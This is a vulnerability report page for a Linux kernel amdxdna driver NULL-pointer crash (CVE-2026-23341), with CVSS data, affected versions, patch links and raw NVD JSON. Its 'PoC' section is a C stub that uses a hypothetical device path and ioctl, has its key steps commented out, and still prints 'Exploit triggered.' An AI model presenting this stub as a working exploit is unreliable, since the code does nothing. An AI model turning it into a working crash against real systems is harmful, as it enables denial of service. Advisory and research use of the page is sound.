Security Vulnerability Report
CVE-2026-23341 CVSS 5.5 MEDIUM

CVE-2026-23341

Published: 2026-03-25 11:16:32
Last Modified: 2026-04-23 21:16:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

accel/amdxdna: Fix crash when destroying a suspended hardware context

If userspace issues an ioctl to destroy a hardware context that has already been automatically suspended, the driver may crash because the mailbox channel pointer is NULL for the suspended context.

Fix this by checking the mailbox channel pointer in aie2_destroy_context() before accessing it.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (accel/amdxdna driver versions prior to commit 8363c02863332992a1822688da41f881d88d1631)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-23341
 * Concept: Trigger NULL pointer dereference in amdxdna driver
 * by destroying a suspended context.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DEVICE_PATH "/dev/accel/accel0"  // Hypothetical device path
#define DESTROY_CONTEXT_IOCTL 0x4001     // Hypothetical IOCTL command

int main(void)
{
    int fd;

    printf("[+] Attempting to open device...\n");
    fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open device");
        return 1;
    }

    printf("[+] Device opened. Creating context...\n");
    // Step 1: Create a context (Implementation specific)
    // int ctx_id = create_context(fd);

    printf("[+] Waiting for context to auto-suspend...\n");
    // Step 2: Wait for idle timeout to trigger automatic suspension
    sleep(10);

    printf("[+] Attempting to destroy suspended context...\n");
    // Step 3: Issue ioctl to destroy context without checking NULL pointer
    // if (ioctl(fd, DESTROY_CONTEXT_IOCTL, &ctx_id) < 0) {
    //     perror("ioctl failed");
    // }

    // If vulnerable, kernel crashes here
    printf("[+] Exploit triggered.\n");

    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23341", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:32.013", "lastModified": "2026-04-23T21:16:30.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/amdxdna: Fix crash when destroying a suspended hardware context\n\nIf userspace issues an ioctl to destroy a hardware context that has\nalready been automatically suspended, the driver may crash because the\nmailbox channel pointer is NULL for the suspended context.\n\nFix this by checking the mailbox channel pointer in aie2_destroy_context()\nbefore accessing it."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\naccel/amdxdna: Corrige un fallo al destruir un contexto de hardware suspendido\n\nSi el espacio de usuario emite un ioctl para destruir un contexto de hardware que ya ha sido suspendido automáticamente, el controlador puede fallar porque el puntero del canal del buzón es NULL para el contexto suspendido.\n\nSoluciona esto comprobando el puntero del canal del buzón en aie2_destroy_context() antes de acceder a él."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.19.4", "versionEndExcluding": "6.19.7", "matchCriteriaId": "EABFC675-2A5E-4569-92F7-1E8942DA0683"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/8363c02863332992a1822688da41f881d88d1631", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a6317704edab95d66a62fc1861d9546284ab678e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}